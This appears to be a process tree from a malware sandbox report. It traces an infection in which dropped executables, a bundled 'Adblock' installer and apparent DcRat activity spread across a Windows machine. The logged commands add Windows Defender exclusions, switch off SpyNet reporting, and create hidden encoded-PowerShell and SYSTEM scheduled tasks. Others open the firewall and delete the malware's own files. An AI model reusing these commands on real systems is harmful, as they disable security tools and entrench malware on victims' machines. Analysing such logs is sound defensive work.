C:\Users\Admin\Pictures\Adobe Films\I8dJ1qS1rcI5yzla9SoRu01p.exe"C:\Users\Admin\Pictures\Adobe Films\I8dJ1qS1rcI5yzla9SoRu01p.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\YisnVpUhrZ2PWS7ZEq2F4LK4.exe"C:\Users\Admin\Pictures\Adobe Films\YisnVpUhrZ2PWS7ZEq2F4LK4.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSE3D3.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSFC4D.tmp\Install.exe.\Install.exe /S /site_id "525403"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAoSMREFD" /SC once /ST 02:13:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAoSMREFD"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAoSMREFD"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bfPiLOEoMHGtOUUyTU" /SC once /ST 07:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\VHmGlhdyjvOSxCI\daUkIim.exe\" HU /site_id 525403 /S" /V1 /F7⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\ktN6_OKyWBLIic4tRrS6Y7lW.exe"C:\Users\Admin\Pictures\Adobe Films\ktN6_OKyWBLIic4tRrS6Y7lW.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /s .\7a69o.PlG5⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\2Se_pjJglnDpbeqjf2ldznTA.exe"C:\Users\Admin\Pictures\Adobe Films\2Se_pjJglnDpbeqjf2ldznTA.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\robocopy.exerobocopy /?5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Organisations.jpg & ping -n 5 localhost5⤵
-
C:\Windows\SysWOW64\cmd.execmd6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AvastUI.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "avastui.exe"7⤵
-
C:\Windows\SysWOW64\find.exefind /I /N "avgui.exe"7⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AVGUI.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^rCLEJGCiZAx$" Member.jpg7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Respect.exe.pifRespect.exe.pif z7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Respect.exe.pifC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Respect.exe.pif Films\2Se_pjJglnDpbeqjf2ldznTA.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 57⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost6⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Adobe Films\noX74RWvzcp4L6vaQgCqmGgG.exe"C:\Users\Admin\Pictures\Adobe Films\noX74RWvzcp4L6vaQgCqmGgG.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\36tK0gCUVT2orDhALS0_tIKC.exe"C:\Users\Admin\Pictures\Adobe Films\36tK0gCUVT2orDhALS0_tIKC.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=7474⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-07OLF.tmp\36tK0gCUVT2orDhALS0_tIKC.tmp"C:\Users\Admin\AppData\Local\Temp\is-07OLF.tmp\36tK0gCUVT2orDhALS0_tIKC.tmp" /SL5="$2034E,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\36tK0gCUVT2orDhALS0_tIKC.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=7475⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"6⤵
-
C:\Windows\system32\reg.exereg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f7⤵
-
C:\Users\Admin\Programs\Adblock\Adblock.exe"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=4b401a7f1663313283 --downloadDate=2022-09-16T07:27:55 --distId=marketator --pid=7476⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Programs\Adblock\crashpad_handler.exeC:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\ed94798b-0b18-4a72-3fdd-58f12738b754.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\ed94798b-0b18-4a72-3fdd-58f12738b754.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\ed94798b-0b18-4a72-3fdd-58f12738b754.run\__sentry-breadcrumb2" --initial-client-data=0x4a0,0x4a4,0x4a8,0x468,0x4ac,0x7ff6a3e4bc80,0x7ff6a3e4bca0,0x7ff6a3e4bcb87⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Update-9cd486d4-c926-473e-8d7b-83211190e1d9\AdblockInstaller.exe"C:\Users\Admin\AppData\Local\Temp\Update-9cd486d4-c926-473e-8d7b-83211190e1d9\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-2H5V6.tmp\AdblockInstaller.tmp"C:\Users\Admin\AppData\Local\Temp\is-2H5V6.tmp\AdblockInstaller.tmp" /SL5="$701FE,11574525,792064,C:\Users\Admin\AppData\Local\Temp\Update-9cd486d4-c926-473e-8d7b-83211190e1d9\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\netsh.exeC:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE7⤵
- Modifies Windows Firewall
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -install7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -start7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"6⤵
-
C:\Windows\system32\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f7⤵
- Modifies registry key
-
C:\Users\Admin\Pictures\Adobe Films\XqFLMvUeBEg_P943krgYtWkU.exe"C:\Users\Admin\Pictures\Adobe Films\XqFLMvUeBEg_P943krgYtWkU.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 51484 -s 4245⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\5PzEorzxArsuyso_tUF64BQZ.exe"C:\Users\Admin\Pictures\Adobe Films\5PzEorzxArsuyso_tUF64BQZ.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\5PzEorzxArsuyso_tUF64BQZ.exe"C:\Users\Admin\Pictures\Adobe Films\5PzEorzxArsuyso_tUF64BQZ.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\nvNlamGS3lVvMXNb9dzkJmr7.exe"C:\Users\Admin\Pictures\Adobe Films\nvNlamGS3lVvMXNb9dzkJmr7.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 4605⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 7645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 7845⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 8205⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 8285⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 9845⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 10165⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 13765⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nvNlamGS3lVvMXNb9dzkJmr7.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\nvNlamGS3lVvMXNb9dzkJmr7.exe" & exit5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nvNlamGS3lVvMXNb9dzkJmr7.exe" /f6⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 14125⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\N_fBXPZTfeRGqijnkDa5J2Jc.exe"C:\Users\Admin\Pictures\Adobe Films\N_fBXPZTfeRGqijnkDa5J2Jc.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Minor Policy\m7tpR8y__P6zIjNc638scLmV.exe"C:\Users\Admin\Pictures\Minor Policy\m7tpR8y__P6zIjNc638scLmV.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 4523⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 7643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 7723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 8483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 8563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 8483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 7963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 11363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 13803⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "m7tpR8y__P6zIjNc638scLmV.exe" /f & erase "C:\Users\Admin\Pictures\Minor Policy\m7tpR8y__P6zIjNc638scLmV.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "m7tpR8y__P6zIjNc638scLmV.exe" /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 6683⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\GosxYJzZkoJQOXo9mXaLnZ9Q.exe"C:\Users\Admin\Pictures\Minor Policy\GosxYJzZkoJQOXo9mXaLnZ9Q.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\6nu8WAAz96Ll697FGgrU_0Ep.exe"C:\Users\Admin\Pictures\Minor Policy\6nu8WAAz96Ll697FGgrU_0Ep.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe"C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe"C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\OaITYmj2fsq0x8aMFqNsCs4j.exe"C:\Users\Admin\Pictures\Minor Policy\OaITYmj2fsq0x8aMFqNsCs4j.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @/c taskkill /im AppLaunch.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" & del C:\PrograData\*.dll & exit4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im AppLaunch.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Minor Policy\eHFS6NZuqQ_xO0mJVksaQreP.exe"C:\Users\Admin\Pictures\Minor Policy\eHFS6NZuqQ_xO0mJVksaQreP.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\nnb09fHefcHKAg9TUhBoFZHP.exe"C:\Users\Admin\Pictures\Minor Policy\nnb09fHefcHKAg9TUhBoFZHP.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\5XX9Z8GfruEUHkqLJGNcaeDq.exe"C:\Users\Admin\Pictures\Minor Policy\5XX9Z8GfruEUHkqLJGNcaeDq.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Users\Admin\Pictures\Minor Policy\gVzdKeepeV1HvUj2IfZ0crmv.exe"C:\Users\Admin\Pictures\Minor Policy\gVzdKeepeV1HvUj2IfZ0crmv.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exe"C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" à D†/c taskkill /im Dj7oV6pePcIXJQ2f96mvaT24.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Minor Policy\Dj7oV6pePcIXJQ2f96mvaT24.exe" & del C:\PrograData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Dj7oV6pePcIXJQ2f96mvaT24.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 18123⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe"C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe"C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exe" -h3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\n2bxaZuE24qU0suJTAECSlqq.exe"C:\Users\Admin\Pictures\Minor Policy\n2bxaZuE24qU0suJTAECSlqq.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 464 -p 5764 -ip 57641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5716 -ip 57161⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 71640 -s 6043⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 71640 -ip 716401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5716 -ip 57161⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 504 -p 51484 -ip 514841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5716 -ip 57161⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6012 -ip 60121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5716 -ip 57161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 51464 -ip 514641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 51464 -ip 514641⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 51464 -ip 514641⤵
-
C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\VHmGlhdyjvOSxCI\daUkIim.exeC:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\VHmGlhdyjvOSxCI\daUkIim.exe HU /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
